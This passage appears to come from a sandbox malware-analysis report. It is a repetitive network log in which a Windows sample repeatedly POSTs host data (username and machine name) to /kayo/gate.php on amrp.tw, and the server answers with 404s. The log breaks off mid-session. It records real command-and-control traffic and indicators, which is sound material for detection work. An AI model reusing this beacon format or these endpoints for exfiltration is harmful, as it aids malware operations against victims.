Apr 29, 2021 09:19:06.550230980 CEST | 1241 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49746 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:07.091418028 CEST | 1242 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:07.340069056 CEST | 1242 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:07.810693979 CEST | 1242 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49747 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:08.631181955 CEST | 1243 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:08.877872944 CEST | 1243 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:09.346967936 CEST | 1244 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49748 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:09.846277952 CEST | 1245 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:10.096031904 CEST | 1245 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:10.716794014 CEST | 1245 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49725 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:46.975892067 CEST | 1148 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:18:47.225796938 CEST | 1149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:18:47.695468903 CEST | 1149 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49749 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:11.264755964 CEST | 1246 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:11.510535002 CEST | 1246 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:11.974939108 CEST | 1247 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49750 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:12.481081963 CEST | 1248 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:12.726524115 CEST | 1249 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:13.478480101 CEST | 1256 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49753 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:13.981782913 CEST | 1257 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:14.227679014 CEST | 1257 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:14.695132017 CEST | 1257 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49754 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:15.458383083 CEST | 1258 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:15.708937883 CEST | 1259 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:16.174881935 CEST | 1259 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49755 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:17.051023006 CEST | 1260 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:17.299782991 CEST | 1260 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:17.768065929 CEST | 1260 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49756 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:18.349585056 CEST | 1261 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:18.602802038 CEST | 1262 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:19.075193882 CEST | 1262 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49757 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:19.940011024 CEST | 1263 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:20.184983015 CEST | 1263 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:20.677717924 CEST | 1263 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.3 | 49758 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:22.226751089 CEST | 1264 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:22.476785898 CEST | 1264 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:22.945744038 CEST | 1265 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49759 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:23.478948116 CEST | 1266 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:23.725191116 CEST | 1266 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:24.203675032 CEST | 1266 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49760 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:24.710110903 CEST | 1267 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:24.956533909 CEST | 1267 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:25.420600891 CEST | 1267 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49726 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:48.534118891 CEST | 1150 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:18:48.780030966 CEST | 1150 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:18:49.245944023 CEST | 1150 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49761 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:25.936889887 CEST | 1268 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:26.185467958 CEST | 1269 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:26.651922941 CEST | 1269 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49762 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:27.173146009 CEST | 1270 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:27.419480085 CEST | 1270 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:27.884638071 CEST | 1270 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.3 | 49763 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:28.395925999 CEST | 1271 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:28.641087055 CEST | 1271 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:29.105942011 CEST | 1272 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.3 | 49764 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:29.651952982 CEST | 1272 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:29.899702072 CEST | 1273 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:30.365235090 CEST | 1273 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.3 | 49765 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:30.895102978 CEST | 1282 | OUT | POST /kayo/gate.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: amrp.tw
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: FC7C64DA
    Content-Length: 163
    Connection: close
Apr 29, 2021 09:19:31.140486956 CEST | 1324 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:31.602879047 CEST | 1325 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 29 Apr 2021 07:19:31 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.6.40
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.3 | 49766 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe

Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:32.208436012 CEST | 1325 | OUT | POST /kayo/gate.php HTTP/1.0
